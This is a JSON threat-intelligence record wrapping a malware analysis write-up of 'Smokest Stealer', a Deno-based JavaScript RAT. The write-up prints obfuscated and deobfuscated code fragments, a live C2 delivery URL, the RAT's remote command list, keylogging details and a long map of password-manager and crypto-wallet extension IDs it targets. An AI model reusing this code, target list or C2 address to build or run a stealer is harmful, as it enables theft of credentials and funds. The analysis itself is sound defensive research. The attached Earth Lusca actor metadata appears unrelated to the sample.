{
	"id": "2b1a124b-ae6c-42e5-b92d-a55e229405a3",
	"created_at": "2026-04-06T00:10:06.46868Z",
	"updated_at": "2026-04-10T13:13:07.155679Z",
	"deleted_at": null,
	"sha1_hash": "c5ccb72393f779cbb24a1c3359527bb871fce8ba",
	"title": "Smokest Stealer, a new malware family? Maybe? | malware source code",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 110311,
	"plain_text": "Smokest Stealer, a new malware family? Maybe? | malware source code\r\nPublished: 2026-01-18 · Archived: 2026-04-05 23:48:02 UTC\r\nSmokest Stealer, a new malware family? Maybe?\r\ntl;dr: multi-functionality RAT written in Deno JavaScript, oligomorphic mutation, lots of stuff it targets, friends online deobfuscated it. Deobfuscated code:\r\nhttps://gist.github.com/vxunderground/48a67e51b375b74be953511b9082f732\r\nJanuary 16th, 2025, MalwareHunterTeam on Twitter noted the discovery of an unusual malware payload titled \"topwebcomicsv1.msi\". After reviewing some of its functionality on VirusTotal, he noted the malicious sample makes a GET request to:\r\nhttps://malwaresourcecode.com/home/my-projects/write-ups/smokest-stealer-a-new-malware-family-maybe\r\nPage 1 of 10\n\nhttp://sharecodepro.com/m/8752e5472b9a3a80/main\r\nThe URL contains a polymorphic JavaScript payload which relies on the Deno JavaScript runtime. This is fairly unusual, as noted by both MalwareHunterTeam and myself. I personally cannot recall a time I saw a malware payload using this. Have you?\r\nWhen you make a GET request you'll notice that on each invocation it does indeed mutate. However, the mutation it uses primarily revolves around variable naming conventions. The core underlying logic does not change. It is more akin to oligomorphic mutation rather than polymorphic mutation.\r\nPreviously I shared on Twitter that I strongly dislike deobfuscating malicious JavaScript payloads; subsequent to this post several malware degenerates popped out of the bushes and volunteered, unironically, to de-obfuscate it just for the love of the game. 
Hence, security researcher nullVoidPtr spent her weekend de-obfuscating various malicious JavaScript payloads because ???\r\nLet's look at it now.\r\nFirst and foremost, each GET request to their C2 delivery URL demonstrates their mutation characteristics clear as day. It also illustrates how primitive it is. Here are the first couple of lines, which we can see change on each GET request:\r\nconst _0x224b90 = _0x64fd;\r\n(function (_0x4f1d5e, _0x16bc75) {\r\n const _0x456e6a = _0x64fd, _0x1f1eea = _0x4f1d5e();\r\n while (!![]) {\r\n try {\r\n const _0x435a48 = parseInt(_0x456e6a(0x2a9)) / 0x1 + -parseInt(_0x456e6a(0x851)) / 0x2 * (-parseInt(\r\n if (_0x435a48 === _0x16bc75)\r\n break;\r\n else\r\n _0x1f1eea['push'](_0x1f1eea['shift']());\r\n } catch (_0x1c340a) {\r\n _0x1f1eea['push'](_0x1f1eea['shift']());\r\n }\r\n }\r\nconst _0x2e9caa = _0xd76d;\r\n(function (_0x546e7d, _0xd59c8b) {\r\n const _0x121f79 = _0xd76d, _0x32b19d = _0x546e7d();\r\n while (!![]) {\r\n try {\r\n const _0x1df090 = -parseInt(_0x121f79(0x873)) / 0x1 + parseInt(_0x121f79(0x3ef)) / 0x2 * (parseInt(_\r\n if (_0x1df090 === _0xd59c8b)\r\n break;\r\n else\r\n _0x32b19d['push'](_0x32b19d['shift']());\r\n } catch (_0x37c848) {\r\n _0x32b19d['push'](_0x32b19d['shift']());\r\n }\r\n }\r\nconst _0x551d5a = _0x52d0;\r\n(function (_0x4ed655, _0x1047c3) {\r\n const _0x2b4e43 = _0x52d0, _0x37975e = _0x4ed655();\r\n while (!![]) {\r\n try {\r\n const _0x1c86b8 = -parseInt(_0x2b4e43(0xaf9)) / 0x1 * (-parseInt(_0x2b4e43(0x8c1)) / 0x2) + parseInt\r\n if (_0x1c86b8 === _0x1047c3)\r\n break;\r\n else\r\n _0x37975e['push'](_0x37975e['shift']());\r\n } catch (_0x297fde) {\r\n _0x37975e['push'](_0x37975e['shift']());\r\n }\r\n }\r\nAs you can see, despite the code 
changing, the core functionality remains the same. This is classic oligomorphic mutation (not quite hash busting, but pretty damn close).\r\nWhen you de-obfuscate the malicious payload (courtesy of nullVoidPtr, I didn't want to deal with it) it unveils a rather large JavaScript stealer. It totals 8,448 lines of code even with a JavaScript beautifier.\r\nThe entry point is located on line 8,351.\r\nIt makes invocations to console.log ... but it doesn't appear anything is modified in the code base to pipe the output to nothing (???).\r\nThe first function call, initializeClient(), builds strings for the malicious domain sharecodepro.com and determines if the URL is active. However, to my surprise, it appears it does not contain any functionality to handle the URL not being active. In the event the C2 is dead the code is basically dead in the water. However, with the URL split code segment it APPEARS the author might INTEND to have multiple domains in the event one is dead. That is not present (yet?).\r\ninitializeClient also invokes the function hc() (speculatively thinking \"HTTP Client\" function?) which builds basic functionality for GET, POST, and WS (Web Socket).\r\nFollowing the client initialization Smokest creates a mutex to ensure the payload only runs once. This is standard behavior.\r\nFollowing this, Smokest creates a unique set of properties to identify the machine by invoking the function getHuidMd5. De-obfuscated it looks like this:\r\nfunction getHuidMd5() {\r\n return crypto.createHash('md5')\r\n .update(\r\n '' +\r\n os.userInfo().username +\r\n os.hostname() +\r\n os.totalmem() +\r\n os.version() +\r\n new Set(os.cpus().map(cpu =\u003e cpu.model.trim()))\r\n )\r\n .digest(\"hex\");\r\n}\r\nThis is used as a unique identifier for the infected host. 
It is used in several other places in the code base for the socket connection and initial registration with the C2:\r\nconsole.log(\r\n \"Token: \" +\r\n \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjYW1wYWlnbklkIjoiNzVjYmUxODY1M2Q1MjM3MiIsImNhbXBhaWduTmFtZSI6IlNtb2tl\r\n .substring(0x0, 0x14) +\r\n \"...\"\r\n);\r\nThe logged token (which is used elsewhere for registration) is a JWT (JSON Web Token), which can be decoded pretty easily. A JWT is Base64 encoded like this:\r\nBASE64URL(header) . BASE64URL(payload) . BASE64URL(signature)\r\nWhen Base64 decoded with PowerShell:\r\n[Text.Encoding]::UTF8.GetString(\r\n [Convert]::FromBase64String(\r\n \"eyJjYW1wYWlnbklkIjoiNzVjYmUxODY1M2Q1MjM3MiIsImNhbXBhaWduTmFtZSI6IlNtb2tlc3QiLCJjYW1wYWlnblVybCI6InNtb2tlc3Q\r\n )\r\n)\r\nWe get this:\r\n{\r\n \"campaignId\": \"75cbe18653d52372\",\r\n \"campaignName\": \"Smokest\",\r\n \"campaignUrl\": \"smokest\",\r\n \"configId\": \"8752e5472b9a3a80\",\r\n \"proxies\": [\"http://sharecodepro.com\"],\r\n \"userId\": \"bb47c0615477a877\",\r\n \"userNote\": \"topwebcomics\",\r\n \"iat\": 1768623552,\r\n \"exp\": 2084199552\r\n}\r\nIAT being \"Issued At\" and EXP being \"expired\", both as Unix timestamps (seconds since January 1st, 1970 UTC), we get:\r\niat: 1768623552\r\n2026-01-17 05:39:12 UTC\r\nexp: 2084199552\r\n2036-01-16 05:39:12 UTC\r\nThe IAT of 2026-01-17 05:39:12 UTC is when I pulled the payload from sharecodepro. Hence, in the future, we can use the IAT to determine when a host was infected.\r\nThankfully, and for reasons I still don't understand, the author of Smokest left us plenty of clues as to what it is doing and what it will do next. 
Here are the console.log invocations (with the middle stuff removed):\r\nconsole.log(\"HUID MD5: \" + _0x1ff8b4);\r\nconsole.log(\"Token: \" + \"\" + \"...\");\r\nconsole.log(\"API URLs: \" + _0x269364.join(',\\x20'));\r\nconsole.log(\"Collecting system info...\");\r\nconsole.log(\"System info collected:\", _0x22c231);\r\nconsole.log(\"Creating WebSocket connection...\");\r\nconsole.log(\"WebSocket created, waiting for connection...\");\r\nconsole.log(\"Connected to server\");\r\n console.error(\"Failed to send PTY output:\", _0x1ced93);\r\nconsole.log(\"Registration message sent\");\r\n console.error(\"Failed to send registration:\", _0xb3a21c);\r\n console.error(\"Keylogger stopped:\", _0x4fc9b4);\r\n console.error(\"Clipboard logger stopped:\", _0x2b6a89);\r\nconsole.log(\"Disconnected from server. Code: \" + _0xc8bd03.code + \", Reason: \" + _0xc8bd03.reason);\r\n console.error(\"Unexpected message type:\", typeof _0x58def6.data);\r\n console.error(\"Error handling message:\", _0x51c326);\r\nconsole.log(\"Event listeners registered, keeping process alive...\");\r\nThe author unironically gave us a tl;dr on what it's going to do, indirectly giving us a step-by-step on what to expect.\r\nI guess now we can just reverse engineer the individual functions because now we see the flow control...\r\nreturn {\r\n username,\r\n hostname,\r\n domain,\r\n osName,\r\n osVersion,\r\n osBuild,\r\n platform,\r\n osType,\r\n osRelease,\r\n cpus,\r\n gpus,\r\n ramMb,\r\n avs,\r\n runningAsAdmin,\r\n hasAdminRights\r\n};\r\nThe fingerprinting and identification it uses is pretty standard. 
Some of it derives from Deno, some of it uses the WINAPI.\r\nfunction getHostname() {\r\n try {\r\n if (Deno?.[\"env\"]?.['get'](\"COMPUTERNAME\") || import_node_process3[\"default\"].env.COMPUTERNAME) {\r\n return true;\r\n }\r\n return import_node_os2[\"default\"].hostname();\r\n } catch {\r\n return void 0x0;\r\n }\r\n}\r\nfunction getDomain() {\r\n if (!kernel324) {\r\n return void 0x0;\r\n }\r\n try {\r\n const _0x1c2352 = 0x100,\r\n _0x4ffd39 = new Uint16Array(_0x1c2352),\r\n _0x316a05 = new Uint32Array([_0x1c2352]),\r\n _0x1e5187 = kernel324.symbols.GetComputerNameExW(0x2, _0x4ffd39, _0x316a05);\r\n if (_0x1e5187 !== 0x0 \u0026\u0026 _0x316a05[0x0] \u003e 0x0) {\r\n const _0x3222f3 = new TextDecoder(\"utf-16le\"),\r\n _0x3108b9 = _0x3222f3.decode(new Uint8Array(_0x4ffd39.buffer, 0x0, _0x316a05[0x0] * 0x2));\r\n if (_0x3108b9) {\r\n return _0x3108b9;\r\n }\r\n return void 0x0;\r\n }\r\n } catch (_0x80f5f8) {\r\n console.warn(\"Failed to get domain:\", _0x80f5f8);\r\n }\r\n return void 0x0;\r\n}\r\nYou can see the invocation to Kernel32!GetComputerNameExW. Why did they name it Kernel324? I have no idea.\r\nSubsequently, Smokest uses User32!GetAsyncKeyState for keylogging and exfiltrates data using sendCommand2().\r\nRegardless, Smokest does contain a bit of interesting functionality. 
One of the event listeners it establishes allows commands to be sent and received.\r\ncase \"screenshot\":\r\ncase \"powershell-command\":\r\ncase \"pty-start\":\r\ncase \"pty-input\":\r\ncase \"pty-resize\":\r\ncase \"pty-stop\":\r\ncase \"socks5-connect\":\r\ncase \"socks5-data\":\r\ncase \"socks5-close\":\r\ncase \"list-drives\":\r\ncase \"list-files\":\r\ncase \"download-file-from-agent\":\r\ncase \"delete-file\":\r\ncase \"upload-file-to-agent\":\r\ncase \"stealer\":\r\ncase \"execute\":\r\nReverse engineering all of these individual commands would take a bit of time, and I've already lost interest in this malware sample. I am actually impressed by its mutation-like features, how many features are present in Smokest, and its (current) low detection score on VirusTotal. Its use of Deno is also an interesting strategy.\r\nVery cool.\r\nThe author clearly put quite a bit of effort into the stealer functionality. While it primarily targets Chromium applications, the author has targeted probably every cryptocurrency wallet (and password manager) on the planet (I'm being hyperbolic... 
or maybe not, I'm not sure).\r\n _0x3e9f72.set(\"Authenticator\", \"bhghoamapcdpbohphigoooaddinpkbai\");\r\n _0x3e9f72.set(\"EOSAuthenticator\", \"oeljdldpnmdbchonielidgobddffflal\");\r\n _0x3e9f72.set(\"Bitwarden\", \"nngceckbapebfimnlniiiahkandclblb\");\r\n _0x3e9f72.set(\"KeePassXC\", \"oboonakemofpalcgghocfoadofidjkkk\");\r\n _0x3e9f72.set(\"Dashlane\", \"fdjamakpfbbddfjaooikfcpapjohcfmg\");\r\n _0x3e9f72.set(\"1Password\", \"aeblfdkhhhdcdjpifhhbdiojplfjncoa\");\r\n _0x3e9f72.set(\"NordPass\", \"fooolghllnmhmmndgjiamiiodkpenpbb\");\r\n _0x3e9f72.set(\"Keeper\", \"bfogiafebfohielmmehodmfbbebbbpei\");\r\n _0x3e9f72.set(\"RoboForm\", \"pnlccmojcmeohlpggmfnbbiapkmbliob\");\r\n _0x3e9f72.set(\"LastPass\", \"hdokiejnpimakedhajhdlcegeplioahd\");\r\n _0x3e9f72.set(\"BrowserPass\", \"naepdomgkenhinolocfifgehidddafch\");\r\n _0x3e9f72.set(\"MYKI\", \"bmikpgodpkclnkgmnpphehdgcimmided\");\r\n _0x3e9f72.set(\"Splikity\", \"jhfjfclepacoldmjmkmdlmganfaalklb\");\r\n _0x3e9f72.set(\"CommonKey\", \"chgfefjpcobfbnpmiokfjjaglahmnded\");\r\n _0x3e9f72.set(\"ZohoVault\", \"igkpcodhieompeloncfnbekccinhapdb\");\r\n _0x3e9f72.set(\"NortonPasswordManager\", \"admmjipmmciaobhojoghlmleefbicajg\");\r\n _0x3e9f72.set(\"AviraPasswordManager\", \"caljgklbbfbcjjanaijlacgncafpegll\");\r\n _0x3e9f72.set(\"TrezorPasswordManager\", \"imloifkgjagghnncjkhggdhalmcnfklk\");\r\n _0x3e9f72.set(\"MetaMask\", \"nkbihfbeogaeaoehlefnkodbefgpgknn\");\r\n _0x3e9f72.set(\"MetaMask_edge\", \"ejbalbakoplchlghecdalmeeeajnimhm\");\r\n _0x3e9f72.set(\"TronLink\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\");\r\n _0x3e9f72.set(\"BinanceChain\", \"fhbohimaelbohpjbbldcngcnapndodjp\");\r\n _0x3e9f72.set(\"Coin98\", \"aeachknmefphepccionboohckonoeemg\");\r\n _0x3e9f72.set(\"iWallet\", \"kncchdigobghenbbaddojjnnaogfppfj\");\r\n _0x3e9f72.set(\"Wombat\", \"amkmjjmmflddogmhpjloimipbofnfjih\");\r\n 
_0x3e9f72.set(\"MEWCX\", \"nlbmnnijcnlegkjjpcfjclmcfggfefdm\");\r\n _0x3e9f72.set(\"NeoLine\", \"cphhlgmgameodnhkjdmkpanlelnlohao\");\r\n _0x3e9f72.set(\"TerraStation\", \"aiifbnbfobpmeekipheeijimdpnlpgpp\");\r\n _0x3e9f72.set(\"Keplr\", \"dmkamcknogkgcdfhhbddcghachkejeap\");\r\n _0x3e9f72.set(\"Sollet\", \"fhmfendgdocmcbmfikdcogofphimnkno\");\r\n _0x3e9f72.set(\"ICONex\", \"flpiciilemghbmfalicajoolhkkenfel\");\r\n _0x3e9f72.set('KHC', \"hcflpincpppdclinealmandijcmnkbgn\");\r\n _0x3e9f72.set(\"TezBox\", \"mnfifefkajgofkcjkemidiaecocnkjeh\");\r\n _0x3e9f72.set(\"Byone\", \"nlgbhdfgdhgbiamfdfmbikcdghidoadd\");\r\n _0x3e9f72.set(\"OneKey\", \"infeboajgfhgbjpjbeppbkgnabfdkdaf\");\r\n _0x3e9f72.set(\"DAppPlay\", \"lodccjjbdhfakaekdiahmedfbieldgik\");\r\n _0x3e9f72.set(\"BitClip\", \"ijmpgkjfkbfhoebgogflfebnmejmfbml\");\r\n _0x3e9f72.set(\"SteemKeychain\", \"lkcjlnjfpbikmcmbachjpdbijejflpcm\");\r\n _0x3e9f72.set(\"NashExtension\", \"onofpnbbkehpmmoabgpcpmigafmmnjhl\");\r\n _0x3e9f72.set(\"HyconLiteClient\", \"bcopgchhojmggmffilplmbdicgaihlkp\");\r\n _0x3e9f72.set(\"ZilPay\", \"klnaejjgbibmhlephnhpmaofohgkpgkd\");\r\n _0x3e9f72.set(\"LeafWallet\", \"cihmoadaighcejopammfbmddcmdekcje\");\r\n _0x3e9f72.set(\"CyanoWallet\", \"dkdedlpgdmmkkfjabffeganieamfklkm\");\r\n _0x3e9f72.set(\"CyanoWalletPro\", \"icmkfkmjoklfhlfdkkkgpnpldkgdmhoe\");\r\n _0x3e9f72.set(\"NaboxWallet\", \"nknhiehlklippafakaeklbeglecifhad\");\r\n _0x3e9f72.set(\"PolymeshWallet\", \"jojhfeoedkpkglbfimdfabpdfjaoolaf\");\r\n _0x3e9f72.set(\"NiftyWallet\", \"jbdaocneiiinmjbjlgalhcelgbejmnid\");\r\n _0x3e9f72.set(\"LiqualityWallet\", \"kpfopkelmapcoipemfendmdcghnegimn\");\r\n _0x3e9f72.set(\"MathWallet\", \"afbcbjpbpfadlkmhmclhkeeodmamcflc\");\r\n _0x3e9f72.set(\"CoinbaseWallet\", \"hnfanknocfeofbddgcijnmhnfnkdnaad\");\r\n _0x3e9f72.set(\"CloverWallet\", \"nhnkbkgjikgcigadomkphalanndcapjk\");\r\n _0x3e9f72.set(\"Yoroi\", \"ffnbelfdoeiohenkjibnmadjiehjhajb\");\r\n _0x3e9f72.set(\"Guarda\", 
\"hpglfhgfnhbgpjdenjgmdgoeiappafln\");\r\n _0x3e9f72.set(\"EQUALWallet\", \"blnieiiffboillknjnepogjhkgnoapac\");\r\n _0x3e9f72.set(\"BitAppWallet\", \"fihkakfobkmkjojpchpfgcmhfjnmnfpi\");\r\n _0x3e9f72.set(\"AuroWallet\", \"cnmamaachppnkjgnildpdmkaakejnhae\");\r\n _0x3e9f72.set(\"SaturnWallet\", \"nkddgncdjgjfcddamfgcmfnlhccnimig\");\r\n _0x3e9f72.set(\"RoninWallet\", \"fnjhmkhhmkbjkkabndcnnogagogbneec\");\r\n _0x3e9f72.set(\"Exodus\", \"aholpfdialjgjfhomihkjbmgjidlcdno\");\r\n _0x3e9f72.set(\"MaiarDeFiWallet\", \"dngmlblcodfobpdpecaadgfbcggfjfnm\");\r\n _0x3e9f72.set(\"Nami\", \"lpfcbjknijpeeillifnkikgncikgfhdo\");\r\n _0x3e9f72.set(\"Eternl\", \"kmhcihpebfmpgmihbkipmjlmmioameka\");\r\n _0x3e9f72.set(\"PhantomWallet\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\");\r\n _0x3e9f72.set(\"TrustWallet\", \"egjidjbpglichdcondbcbdnbeeppgdph\");\r\nSource: https://malwaresourcecode.com/home/my-projects/write-ups/smokest-stealer-a-new-malware-family-maybe",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://malwaresourcecode.com/home/my-projects/write-ups/smokest-stealer-a-new-malware-family-maybe"
	],
	"report_names": [
		"smokest-stealer-a-new-malware-family-maybe"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434206,
	"ts_updated_at": 1775826787,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c5ccb72393f779cbb24a1c3359527bb871fce8ba.pdf",
		"text": "https://archive.orkl.eu/c5ccb72393f779cbb24a1c3359527bb871fce8ba.txt",
		"img": "https://archive.orkl.eu/c5ccb72393f779cbb24a1c3359527bb871fce8ba.jpg"
	}
}